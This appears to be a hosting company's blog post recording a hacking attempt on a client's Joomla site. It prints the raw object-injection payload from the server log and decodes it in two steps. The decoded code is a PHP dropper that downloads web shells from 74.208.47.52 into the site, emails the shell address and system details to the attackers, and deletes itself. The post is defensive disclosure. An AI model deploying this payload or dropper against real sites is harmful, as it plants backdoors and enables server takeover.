daknetworks.com

You are here: Blog Hacking Attempt 16-06

Hacking Attempt 16-06

Here's another hacking attempt on another hosted web site. This attempt is from: 74.208.47.52 which was resolving to catchmeapp.com

NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker.

==========================
GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp
lepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_u
rl\";s:3810:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7
DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRz
l3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFj
bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSn
VJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5
OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0ME55NDFNaTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1
kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNS
amFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVl
UxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4M05DNHlNRGd1TkRjdU5USXZaMlYw
TDIwdWRIaDBKeWs3RFFva2IzQmxiaklnUFNCbWIzQmxiaWdrWTJobFkyc3lMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjR1Z1TWl3Z0pIUmxlSFF5S1RzTkNtWmpiRzl6WlNna2IzQmxiaklwT3cwS2FXWW9abW
xzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVa
VElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6Yz
BMakl3T0M0ME55NDFNaTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RR
b05DaVJqYUdWamF6UTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlqYUdWamF5NXdhSEFpSURzTkNpUjBaWGgwTkNBOUlHaDBkSEJmWjJWME
tDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5
elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTl
NBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5dGJTNTBlSFFuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1Iw
WlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSE
FpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5MWMyVnlMblI0ZENjcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEta
bmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2IyeHZhbVZ6YUdGcllYSmhRR2R0WVdsc0xtTn
ZiU0k3RFFva2MzVmlhbVZqZENBOUlDZEtiMjBnZW5wNklDY2dMaUFrWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhUc05DaVJvWldGa1pYSWdQU0FuWm5KdmJUb2dTMlZyYTJGcElGTmxibk5sYmlBOGRt
OXVVbVZwYm1obGNucExiR0YxYzBCVFlXbHJiM1Z1WVVocFlta3VZMjl0UGljZ0xpQWlYSEpjYmlJN0RRb2tiV1Z6YzJGblpTQTlJQ0pUYUdWc2JIb2dPaUJvZEhSd09pOHZJaUF1SUNSZlUwVlNWa1ZTV3lkVF
JWSldSVkpmVGtGTlJTZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNMbkJvY0Q5MUlpQXVJQ0pjY2x4dUlpQXVJSEJvY0Y5MWJtRnRaU2dwSUM0Z0lseHlYRzRpT3cwS0pITmxiblJ0WVds
c0lEMGdRRzFoYVd3b0pIUnZlaXdnSkhOMVltcGxZM1FzSUNSdFpYTnpZV2RsTENBa2FHVmhaR1Z5S1RzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKT
s='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s
:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
===============================================

This translates into:

===============================================
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvY3NzLnR4dCcpOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly83NC4yMDguNDcuNTIvZ2V0L20udHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3cuaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvdy50eHQnKTsNCiRvcDM9Zm9wZW4oJGNoZWNrMywgJ3cnKTsNCmZ3cml0ZSgkb3AzLCR0ZXh0Myk7DQpmY2xvc2UoJG9wMyk7DQoNCiRjaGVjazQ9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9jaGVjay5waHAiIDsNCiR0ZXh0NCA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9tbS50eHQnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY2xvc2UoJG9wNSk7DQoNCiRjaGVjazY9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qdXNlci5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC91c2VyLnR4dCcpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICJnYWJieS5jYXNoQHlhbmRleC5jb20sb2xvamVzaGFrYXJhQGdtYWlsLmNvbSI7DQokc3ViamVjdCA9ICdKb20genp6ICcgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsNCiRoZWFkZXIgPSAnZnJvbTogS2Vra2FpIFNlbnNlbiA8dm9uUmVpbmhlcnpLbGF1c0BTYWlrb3VuYUhpYmkuY29tPicgLiAiXHJcbiI7DQokbWVzc2FnZSA9ICJTaGVsbHogOiBodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocD91IiAuICJcclxuIiAuIHBocF91bmFtZSgpIC4gIlxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRveiwgJHN1YmplY3QsICRtZXNzYWdlLCAkaGVhZGVyKTsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQoNCg0KPz4='));
fclose($fp);
================================================

Which further is decoded to:

================================================

<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('http://74.208.47.52/get/css.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://74.208.47.52/get/m.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;
$text3 = http_get('http://74.208.47.52/get/w.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://74.208.47.52/get/c.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://74.208.47.52/get/mm.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;
$text6 = http_get('http://74.208.47.52/get/user.txt');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = " This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it ";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >'; document.write( '' ); document.write( addy_text38424 ); document.write( '<\/a>' ); //--> This e-mail address is being protected from spambots. You need JavaScript enabled to view it ;' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);


?>
===============================================

Nice try... but not this time.